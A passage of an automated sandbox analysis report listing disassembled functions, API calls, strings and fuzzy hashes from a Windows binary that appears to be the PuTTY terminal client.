                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                    • API String ID: 190572456-129414566
                    • Opcode ID: 3ef3cbac7f5779083763ba11ed0be7cba99dcb4e0beb7fe6731d15923ddc236d
                    • Instruction ID: 48a9b8e141ef735a6dfc182602695684c95e086077c191310ea07e943db1e797
                    • Opcode Fuzzy Hash: 3ef3cbac7f5779083763ba11ed0be7cba99dcb4e0beb7fe6731d15923ddc236d
                    • Instruction Fuzzy Hash: 2E214AB43417029BDB1A9F25ECAAF2EB7E5BB04706F00492EE407862A0EF71D804DB05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD0390 Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,0000018A,?,00000000), ref: 00BD03AF
                    • SendDlgItemMessageA.USER32(?,?,00000189,?,00000000), ref: 00BD03CD
                    • SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00BD03D9
                    • SendDlgItemMessageA.USER32(?,?,00000185,00000000,?), ref: 00BD03E9
                    • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 00BD03F5
                    • SendDlgItemMessageA.USER32(?,?,00000181,?), ref: 00BD0406
                    • SendDlgItemMessageA.USER32(?,?,0000019A,?,00000000), ref: 00BD0414
                    • SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00BD0420
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID:
                    • API String ID: 3015471070-0
                    • Opcode ID: 46754d9f81439e45afd278e1b37efd2c1718ca52c74d8bc30fa0a2568ead7575
                    • Instruction ID: a554d640a543bd7d8019bec36e457c7d63cc045bfc271078036a16d72a5c4ed8
                    • Opcode Fuzzy Hash: 46754d9f81439e45afd278e1b37efd2c1718ca52c74d8bc30fa0a2568ead7575
                    • Instruction Fuzzy Hash: 7401B5712817083BF12126129C46FAF7E6CDFC3F88F014118F744691C0DAA6AE02827A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD49F0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: LocalTime
                    • String ID: %H%M%S$&$&$&
                    • API String ID: 481472006-1342691861
                    • Opcode ID: 8ce91a63e2533703f7b46149fda59d11434a328bef3d071370d5993e9bc77cf8
                    • Instruction ID: d4a0a92bf3e5fc0cfcc0302921fa104b7f95cbed849997efc0f2745d2847ee14
                    • Opcode Fuzzy Hash: 8ce91a63e2533703f7b46149fda59d11434a328bef3d071370d5993e9bc77cf8
                    • Instruction Fuzzy Hash: 7F5106B6949344AFD710AB20AC8673BB7E4EB55704F4C49ABF89987382F331D9188753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C161F0 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C161FA
                    • CloseHandle.KERNEL32(?), ref: 00C16223
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C1622A
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C16249
                    • SetEvent.KERNEL32(?), ref: 00C162FD
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C163B4
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseEventHandle
                    • String ID:
                    • API String ID: 1488367401-0
                    • Opcode ID: dce4a45660f8b2bd737aec653b450d7267ebf0f4ff8b736f92bf0aa6a3eb79ac
                    • Instruction ID: b3c7109b08a6dce2c7115ebc9f875c4adb577dbfb942d2a5294ef0dd624411e7
                    • Opcode Fuzzy Hash: dce4a45660f8b2bd737aec653b450d7267ebf0f4ff8b736f92bf0aa6a3eb79ac
                    • Instruction Fuzzy Hash: 23519470500290EFDB119F19DCC5BA97BA4EF06304F0880A8ED0A9F297D7B5E995DB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3EA90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 129libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 00C3EAA6
                    • _strcat.LIBCMT ref: 00C3EADB
                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C3EB1A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc_strcat_strlen
                    • String ID: %02x$CryptProtectMemory$crypt32.dll
                    • API String ID: 3651457578-4241872374
                    • Opcode ID: 9bce28b33c68db5cfc35f71e58251911dd04fd4da741d01b28afc7c8e03caad5
                    • Instruction ID: 7859c62a136a3fde1e1f156326f00379ce9086aa8580d18c3dca1bc77a475120
                    • Opcode Fuzzy Hash: 9bce28b33c68db5cfc35f71e58251911dd04fd4da741d01b28afc7c8e03caad5
                    • Instruction Fuzzy Hash: 9231F4F19103406BDB1167356C8AF5B7BE89F41309F080564F80A9B282E622DA04C7A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4EBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00C4EBD7
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C4EBDF
                    • _ValidateLocalCookies.LIBCMT ref: 00C4EC68
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C4EC93
                    • _ValidateLocalCookies.LIBCMT ref: 00C4ECE8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 501b0416d9e80f9375d988528259d1f116d1145bbbb0ba16ffffea7e8a690afc
                    • Instruction ID: 8dd1b002bfbbf7154c0e09628919c6e3d5d4b8518700f21728f05efd04972729
                    • Opcode Fuzzy Hash: 501b0416d9e80f9375d988528259d1f116d1145bbbb0ba16ffffea7e8a690afc
                    • Instruction Fuzzy Hash: AB41A234E002099FCF21EF69C8C5AAEBBB5FF45328F158155E8259B392D731AE01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEC750 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                      • Part of subcall function 00BEC620: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                    • GetCurrentProcess.KERNEL32 ref: 00BEC832
                    • GetLastError.KERNEL32 ref: 00BEC86C
                    • LocalFree.KERNEL32(?), ref: 00BEC893
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
                    • String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
                    • API String ID: 4156538165-2118130043
                    • Opcode ID: c3a26507354c67ce29522b0a10a301bc14d72414f154151f34bfa9ab7d14d87f
                    • Instruction ID: 5f775051f969551d22e4046d8674e31933b5f05f3cd9750671e808f8f7f3ac6f
                    • Opcode Fuzzy Hash: c3a26507354c67ce29522b0a10a301bc14d72414f154151f34bfa9ab7d14d87f
                    • Instruction Fuzzy Hash: F5318DB0608341AFE710DF11D949B2FBFE8EB84B48F04495CF5899B391D3B69905CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3F0C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97pipeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateNamedPipeA.KERNEL32(?,40000003,00000008,000000FF,00001000,00001000,00000000), ref: 00C3F113
                    • ConnectNamedPipe.KERNEL32(?,00000010), ref: 00C3F12A
                    • GetLastError.KERNEL32 ref: 00C3F134
                    • CloseHandle.KERNEL32(?), ref: 00C3F176
                    Strings
                    • Error while listening to named pipe: %s, xrefs: 00C3F193
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: NamedPipe$CloseConnectCreateErrorHandleLast
                    • String ID: Error while listening to named pipe: %s
                    • API String ID: 3669627233-1472817922
                    • Opcode ID: f0fa0446c8e33bd906bed36271252604754ada083b84050c10d8def98e1ccf44
                    • Instruction ID: a8c588b862f121fd84097216c60f9c8f9a9c6eb0d5d02d42c18c41420540d54b
                    • Opcode Fuzzy Hash: f0fa0446c8e33bd906bed36271252604754ada083b84050c10d8def98e1ccf44
                    • Instruction Fuzzy Hash: 9631B670A10300AFE7246B25EC85F2F77E8EF88354F14493CF45BD7291D771A9418A52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB2090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: 7f72481688b73f7f1cf001e888694b55747d7d01afd53d24deac218bcbb9d805
                    • Instruction ID: aaef47830a5ef8914ece326c2acd2bd01dfda47133c094adacfd8ad171803870
                    • Opcode Fuzzy Hash: 7f72481688b73f7f1cf001e888694b55747d7d01afd53d24deac218bcbb9d805
                    • Instruction Fuzzy Hash: CA218D316183009FE715AB25ED99BFE77E0FB41304F58892CF686861A1DBB58C48EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB205E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: d61eaeed568a42ecc197bbdc1f381e59a3561979a986896ea5fc33d0a00d8668
                    • Instruction ID: 5f862d47f68e75f7bc674ee8aca222e27fb38a3761c378183afd0c32d8ed2a9c
                    • Opcode Fuzzy Hash: d61eaeed568a42ecc197bbdc1f381e59a3561979a986896ea5fc33d0a00d8668
                    • Instruction Fuzzy Hash: 7A21AD312082009FD715AB25EC85BFE77E0FB41304F58492CF586C61A1DBB5DC44EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB2076 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: ce4e26d5d494d42941f1ad2782e06720bf9a76c25d6ab9cdd34e69737b76ade9
                    • Instruction ID: ed201b708b0fa4492453e0b5820c0321eb390af78557aa85b7ee178ddeeba916
                    • Opcode Fuzzy Hash: ce4e26d5d494d42941f1ad2782e06720bf9a76c25d6ab9cdd34e69737b76ade9
                    • Instruction Fuzzy Hash: A021AD312482009FE725AB25EC85BFE77E0FB41314F584A2CF587861E1DBB58C44EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C62BF9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00C62D06,?,?,?,00000000,?,?,00C6270A,00000021,FlsSetValue,00C8A8F8,00C8A900,?), ref: 00C62CBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: 317337f88d521560cdb51465d258231b1389148e6a27c867795978e90afc444e
                    • Instruction ID: cae77c61675d40f1e94dea891cb1c62976c7fc44695a4666287ca4d6b790f512
                    • Opcode Fuzzy Hash: 317337f88d521560cdb51465d258231b1389148e6a27c867795978e90afc444e
                    • Instruction Fuzzy Hash: D121E731A01611BBEB319B259CC4B5E3BA8EF457A4F290210F923E7294D774EF00D6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3EBF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • CreateMutexA.KERNEL32(?,00000000,?), ref: 00C3EC5F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00C3EC6E
                    • GetLastError.KERNEL32(?,00000000,?), ref: 00C3EC76
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C17C1B,00000000,?), ref: 00C3ECA1
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C17C1B,00000000,?), ref: 00C3ECB0
                      • Part of subcall function 00BEC480: LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BEC54D
                      • Part of subcall function 00BEC480: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BEC55D
                      • Part of subcall function 00BEC480: SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BEC572
                      • Part of subcall function 00BEC480: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BEC585
                    Strings
                    • CreateMutex("%s") failed: %s, xrefs: 00C3EC87
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait_strlen
                    • String ID: CreateMutex("%s") failed: %s
                    • API String ID: 3757897666-2623464464
                    • Opcode ID: 8a3c05e63f9e1426d3abedbe0f4f3246e33b9f70d85a6d359ead3c32f3f64ea6
                    • Instruction ID: 7d3c3a5c7bf462e0881d7fee468000896318021734058e0ae35aed5f631c6b09
                    • Opcode Fuzzy Hash: 8a3c05e63f9e1426d3abedbe0f4f3246e33b9f70d85a6d359ead3c32f3f64ea6
                    • Instruction Fuzzy Hash: 7C216FB16043116FE710EF25DC49B6F7BE8EB85758F054918F856D7281D734D904CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteMenu.USER32(00000040,00000000), ref: 00BB68C5
                    • InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BB68DE
                    • DeleteMenu.USER32(00000040,00000000), ref: 00BB68EA
                    • InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BB68FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$DeleteInsert
                    • String ID: %s (inactive)$&Restart Session
                    • API String ID: 985044671-219138112
                    • Opcode ID: 46296d96e44be574ecce2910e14c42d2b60fa4f364c60692ef39783f628378dd
                    • Instruction ID: 970d67dec07bff2c5024b6fbc513e3702478706823035fe6a77eb7589b9884cf
                    • Opcode Fuzzy Hash: 46296d96e44be574ecce2910e14c42d2b60fa4f364c60692ef39783f628378dd
                    • Instruction Fuzzy Hash: BE2187B1740240BBE7106F65FC1AF8E3B98EB41705F580170FA09BB1E1DAB1A855CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C160F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CloseHandle.KERNEL32(?), ref: 00C1613E
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C1614C
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C1616E
                    • SetEvent.KERNEL32(?), ref: 00C16188
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c, xrefs: 00C16105
                    • h && !h->u.g.moribund, xrefs: 00C1610A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseEnterEventHandleLeave
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c$h && !h->u.g.moribund
                    • API String ID: 1836394787-1076956789
                    • Opcode ID: da4a70214f3b7635f322be7fd828d21f8d35a686f987ec4a97b46309bb8f47a9
                    • Instruction ID: 504ca07c14c1717730226fe336d27d0823d6fec3e9ee86a74a1a095bda0355b4
                    • Opcode Fuzzy Hash: da4a70214f3b7635f322be7fd828d21f8d35a686f987ec4a97b46309bb8f47a9
                    • Instruction Fuzzy Hash: 44118C70500780ABD7358F65E808B9ABBF0FF46715F14886DE49743AA1C371B588DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6680 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorA.USER32 ref: 00BB694A
                    • SetClassLongA.USER32(000000F4,00000000), ref: 00BB695B
                    • SetCursor.USER32(00000000), ref: 00BB6962
                    • ShowCursor.USER32(00000000), ref: 00BB6974
                    Strings
                    • false && "Bad busy_status", xrefs: 00BB698D
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BB6988
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
